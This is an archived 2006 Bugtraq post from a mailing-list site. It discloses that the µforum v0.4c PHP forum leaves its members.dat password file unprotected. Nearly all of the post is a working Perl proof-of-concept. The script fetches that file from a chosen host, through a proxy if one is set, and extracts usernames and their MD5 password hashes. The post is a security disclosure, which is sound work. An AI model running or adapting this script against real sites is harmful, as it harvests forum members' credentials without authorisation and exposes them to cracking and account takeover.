lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: 1 Sep 2006 15:53:19 -0000 From: gmdarkfig@...il.com To: bugtraq@...urityfocus.com Subject: forum v0.4c (members.dat) MD5 Passwd Hash Disclosure Poc #!/usr/bin/perl # # Affected.scr..: µforum v0.4c # Poc.ID........: 08060901 # Type..........: Member's passwords are stored in .dat file no protected by a .htaccess file # Risk.level....: Medium # Vendor.Status.: Unpatched # Src.download..: comscripts.com/scripts/php.forum.1568.html # Poc.link......: acid-root.new.fr/poc/08060901.txt # Credits.......: DarkFig # use LWP::UserAgent; use HTTP::Request; use Getopt::Long; use strict; print STDOUT "\n+", '-' x 36, "+\n"; print STDOUT "| µforum v0.4c (members.dat) Exploit |\n"; print STDOUT '+', '-' x 36, "+\n"; my($host,$path,$proxh,$proxu,$proxp); my $opt = GetOptions( 'host=s' => \$host, 'path=s' => \$path, 'proxh=s' => \$proxh, 'proxu=s' => \$proxu, 'proxp=s' => \$proxp); if(!$path) {$path = '/';} $host .= $path.'membres/members.dat'; if($host !~ /http/) {$host = 'http://'.$host;} my $ua = LWP::UserAgent->new(); $ua->agent('Mozilla'); $ua->timeout(30); $ua->proxy(['http'] => $proxh) if $proxh; my $req = HTTP::Request->new('GET', $host); $req->proxy_authorization_basic($proxu, $proxp) if $proxp; my $res = $ua->request($req); my $dat = $res->content; my @tabl= split(/:/, $dat); foreach (@tabl) { if($_ =~ /"(.*)";a/){ print "\n".$1.'::';} if($_ =~ /"([a-z0-9]{32})";i/){ print $1;} } print "\n"; exit(0);
Powered by blists - more mailing lists